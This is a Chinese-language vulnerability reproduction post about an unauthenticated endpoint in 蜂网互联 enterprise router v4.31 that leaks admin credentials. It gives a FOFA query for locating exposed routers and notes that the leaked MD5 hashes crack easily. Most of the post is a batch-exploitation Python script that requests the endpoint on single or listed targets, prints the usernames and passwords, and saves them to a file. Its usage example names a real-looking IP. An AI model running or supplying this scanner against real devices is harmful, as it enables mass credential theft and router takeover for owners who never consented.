【漏洞复现】蜂网互联 企业级路由器v4.31 密码泄露漏洞

蜂网互联企业级路由器v4.31存在接口未授权访问，导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器

影响范围

蜂网互联企业级路由器v4.31

fofa语法

app="蜂网互联-互联企业级路由器"

漏洞复现

/action/usermanager.htm 存在未授权访问，可通过直接访问获得账号密码

md5直接解密就可以了

批量检测脚本

用原作者的脚本稍微改了一下

from optparse import OptionParser
import requests
import json


# import time
# import eventlet

def banner():
    print("""
  _____             _                                                     
 |  __ \           | |                                                    
 | |__) |___  _   _| |_ ___ _ __   ___  ___ __ _ _ __                     
 |  _  // _ \| | | | __/ _ \ '__| / __|/ __/ _` | '_ \                    
 | | \ \ (_) | |_| | ||  __/ |    \__ \ (_| (_| | | | |                   
 |_|  \_\___/ \__,_|\__\___|_|   _|___/\___\__,_|_| |_|                   
                                | |         | |                           
                          ______| |__  _   _| |_   _ _______  _ __   __ _ 
                         |______| '_ \| | | | | | | |_  / _ \| '_ \ / _` |
                                | |_) | |_| | | |_| |/ / (_) | | | | (_| |
                                |_.__/ \__, |_|\__,_/___\___/|_| |_|\__, |
                                        __/ |                        __/ |
                                       |___/                        |___/                                                                                                      
    	""")


def getpass(target):
    try:
        r = requests.get(target + '/action/usermanager.htm', timeout=2)
        # return r.text
        # print('===========')
        # print(r.text)
        # print('===========')
    except requests.exceptions.Timeout:
        print('[-]' + target + '请求超时')
    else:
        if response.status_code == 200:
            s = json.loads(r.text)
            if 'rows' in s:
                s = str(s['rows'])
                s = s.replace("[", "")
                s = s.replace("]", "")
                s = s.replace("\'", "\"")
                s2 = json.loads(s)
                print('[+]' + "账号:" + s2['user'] + "，密码:" + s2['pwd'] + "\n登录地址为:" + target + "/login.html")
            else:
                print('[-]' + target + "不存在该漏洞")
        else:
            print('[-]' + target + '请求被拒绝')


def getpass1(target):
    try:
        try:
            r = requests.get(target + '/action/usermanager.htm', timeout=2)
            # return r.text
            # print('===========')
            # print(r.text)
            # print('===========')
        except requests.exceptions.Timeout:
            print('[-]' + target + '请求超时')
        else:
            if r.status_code == 200:
                s = json.loads(r.text)
                if 'rows' in s:
                    s = str(s['rows'])
                    s = s.replace("[", "")
                    s = s.replace("]", "")
                    s = s.replace("\'", "\"")
                    s2 = json.loads(s)
                    sur = ('[+]' + "账号:" + s2['user'] + "，密码:" + s2['pwd'] + "\n登录地址为:" + target + "/login.html")
                    print(sur)
                    with open('success.txt', mode="a", encoding="utf-8") as f:
                        f.write(sur + '\n')
                else:
                    print('[-]' + target + "不存在该漏洞")
            else:
                print('[-]' + target + '请求被拒绝')
    except:
        print('未知错误')

def main():
    usage = "example: python3 %prog -t 目标(格式：http://112.53.152.210:888)"
    parser = OptionParser(usage=usage)
    parser.add_option('-t', dest='target', type='string', help='目标ip')
    parser.add_option('-r', dest='file1', type='string', help='目标ip合并文本文档')
    (options, args) = parser.parse_args()

    target = options.target
    file1 = options.file1
    if target:
        getpass(target)
    if file1:
        with open(file1, mode='rt', encoding='utf-8') as f:
            for line in f.readlines():
                line = line.rstrip()
                getpass1(line)


if __name__ == "__main__":
    banner()
    main()